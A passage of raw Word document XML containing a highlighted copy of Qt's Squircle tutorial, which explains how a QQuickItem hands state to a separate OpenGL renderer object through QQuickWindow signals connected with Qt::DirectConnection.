          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::beforeRendering</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(), we make the renderer a</w:t>
      </w:r>
      <w:r w:rsidR="004A34D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2176" w:history="1">
        <w:r w:rsidRPr="004A34D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="004A34D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>renderer contains a copy of all the state it needs, independent of the GUI thread</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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4A34D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="004A34D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A34D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Don't be tempted to merge the two objects into one. QQuickItems may be deleted on the GUI thread while the render thread is rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0035792D" w:rsidRPr="0035792D" w:rsidRDefault="0035792D" w:rsidP="0035792D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lets move on to the implementation.</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>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m_t</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m_renderer</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connect</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQuickItem</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windowChanged</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this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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>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handleWindowChanged</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35792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The constructor of the</w:t>
      </w:r>
      <w:r w:rsidR="004A34D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Squircle</w:t>
      </w:r>
      <w:r w:rsidR="004A34D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">class simply initializes the values and connects to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>window changed signal which we will use to prepare our renderer</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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handleWindowChanged</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QQuickWindow</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win</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if</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win</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connect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win</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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQuickWindow</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beforeSynchronizing</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this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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>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sync</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Qt</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DirectConnection</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        connect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win</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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQuickWindow</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sceneGraphInvalidated</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this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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>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cleanup</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D1029A">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DirectConnection</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35792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Once we have a window, we attach to the</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2177" w:anchor="beforeSynchronizing" w:history="1">
        <w:r w:rsidRPr="0035792D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::beforeSynchronizing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() signal which we will </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use to create the renderer and to copy state into it safely</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. We also connect to the</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2178" w:anchor="sceneGraphInvalidated" w:history="1">
        <w:r w:rsidRPr="0035792D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::sceneGraphInvalidated</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() signal </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to handle the cleanup of the renderer</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Since the Squircle object has affinity to the GUI thread and the signals are emitted from the rendering thread, it is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>crucial</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the connections are made with</w:t>
      </w:r>
      <w:r w:rsidR="00D1029A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2179" w:anchor="ConnectionType-enum" w:history="1">
        <w:r w:rsidRPr="00D1029A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt::DirectConnection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Failing to do so, will result</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in that the slots are invoked on the wrong thread with no OpenGL context present.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win</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setClearBeforeRendering</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</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35792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default behavior of the scene graph</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is to c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lear the framebuffer before rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Since we render before the scene graph, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>we need to turn this clearing off</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This means that we need to clear ourselves in the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>paint()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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sync</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if</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m_renderer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m_renderer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new</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SquircleRenderer</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connect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window</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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQuickWindow</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beforeRendering</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m_renderer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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SquircleRenderer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paint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Qt</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DirectConnection</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m_renderer</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setViewportSize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window</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size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window</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devicePixelRatio</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m_renderer</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setT</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m_t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m_renderer</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setWindow</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window</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35792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We use the</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sync()</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">function to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>initialize the renderer and to copy the state</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in our item into the renderer. When the renderer is created, we also </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connect</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00D1029A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2180" w:anchor="beforeRendering" w:history="1">
        <w:r w:rsidRPr="0035792D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
